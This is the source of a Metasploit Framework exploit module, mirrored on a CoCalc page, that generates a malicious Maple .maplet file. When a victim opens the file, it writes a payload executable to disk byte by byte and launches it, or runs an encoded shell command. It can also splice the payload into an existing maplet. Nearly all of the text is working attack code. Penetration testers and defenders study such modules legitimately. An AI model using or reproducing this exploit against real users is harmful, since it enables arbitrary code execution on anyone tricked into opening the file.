Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/multi/fileformat/maple_maplet.rb
19848 views
1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5
6
class MetasploitModule < Msf::Exploit::Remote
7
Rank = ExcellentRanking
8
9
include Msf::Exploit::FILEFORMAT
10
include Msf::Exploit::EXE
11
12
def initialize(info = {})
13
super(
14
update_info(
15
info,
16
'Name' => 'Maple Maplet File Creation and Command Execution',
17
'Description' => %q{
18
This module harnesses Maple's ability to create files and execute commands
19
automatically when opening a Maplet. All versions up to 13 are suspected
20
vulnerable. Testing was conducted with version 13 on Windows. Standard security
21
settings prevent code from running in a normal maple worksheet without user
22
interaction, but those setting do not prevent code in a Maplet from running.
23
24
In order for the payload to be executed, an attacker must convince someone to
25
open a specially modified .maplet file with Maple. By doing so, an attacker can
26
execute arbitrary code as the victim user.
27
},
28
'License' => MSF_LICENSE,
29
'Author' => [
30
'scriptjunkie'
31
],
32
'References' => [
33
[ 'OSVDB', '64541'],
34
[ 'URL', 'http://www.maplesoft.com/products/maple/' ]
35
],
36
'Payload' => {
37
'Space' => 1024,
38
'BadChars' => '',
39
'DisableNops' => true,
40
# 'Compat' =>
41
# {
42
# 'PayloadType' => 'cmd',
43
# 'RequiredCmd' => 'generic perl telnet',
44
# }
45
},
46
'Platform' => %w{win linux unix},
47
'Targets' => [
48
[
49
'Windows',
50
{
51
'Arch' => ARCH_X86,
52
'Platform' => 'win'
53
}
54
],
55
56
[
57
'Windows X64',
58
{
59
'Arch' => ARCH_X64,
60
'Platform' => 'win'
61
}
62
],
63
64
[
65
'Linux',
66
{
67
'Arch' => ARCH_X86,
68
'Platform' => 'linux'
69
}
70
],
71
72
[
73
'Linux X64',
74
{
75
'Arch' => ARCH_X64,
76
'Platform' => 'linux'
77
}
78
],
79
80
[
81
'Universal CMD',
82
{
83
'Arch' => ARCH_CMD,
84
'Platform' => %w{linux unix win}
85
}
86
]
87
88
],
89
'DisclosureDate' => '2010-04-26',
90
'DefaultTarget' => 0,
91
'Notes' => {
92
'Reliability' => UNKNOWN_RELIABILITY,
93
'Stability' => UNKNOWN_STABILITY,
94
'SideEffects' => UNKNOWN_SIDE_EFFECTS
95
}
96
)
97
)
98
99
register_options(
100
[
101
OptString.new('TEMPLATE', [ false, 'The file to infect.', '']),
102
OptString.new('FILENAME', [ true, 'The output file.', 'msf.maplet']),
103
]
104
)
105
end
106
107
def exploit
108
cmd = ''
109
content = ''
110
if target['Arch'] != ARCH_CMD
111
# Get payload as executable on whatever platform
112
binary = generate_payload_exe
113
114
# Get filename and random variable name for file handle in script
115
fname = rand_text_alpha(3 + rand(15))
116
if target['Platform'] == 'win'
117
fname << ".exe"
118
end
119
fhandle = rand_text_alpha(3 + rand(15))
120
121
# Write maple commands to create executable
122
content = fhandle + " := fopen(\"#{fname}\",WRITE,BINARY);\n"
123
exe = binary.unpack('C*')
124
125
content << "writebytes(#{fhandle},[#{exe[0]}"
126
lines = []
127
1.upto(exe.length - 1) do |byte|
128
if (byte % 100 == 0)
129
lines.push "]);\r\nwritebytes(#{fhandle},[#{exe[byte]}"
130
else
131
lines.push ",#{exe[byte]}"
132
end
133
end
134
content << lines.join("") + "]);\r\n"
135
136
content << "fclose(" + fhandle + ");\n"
137
# Write command to be executed
138
if target['Platform'] != 'win'
139
content << "system(\"chmod a+x #{fname}\");\n"
140
end
141
content << "system[launch](\"#{fname}\");\n"
142
else
143
content << "system(\"#{payload.encoded}\");\n"
144
end
145
146
# Then put the rest of the original maplet
147
if datastore['TEMPLATE'] != ''
148
File.open(datastore['TEMPLATE'], 'rb') do |fd|
149
content << fd.read(File.size(datastore['TEMPLATE']))
150
end
151
end
152
153
# Create the file
154
print_status("Creating '#{datastore['FILENAME']}' file...")
155
file_create(content)
156
end
157
end
158
159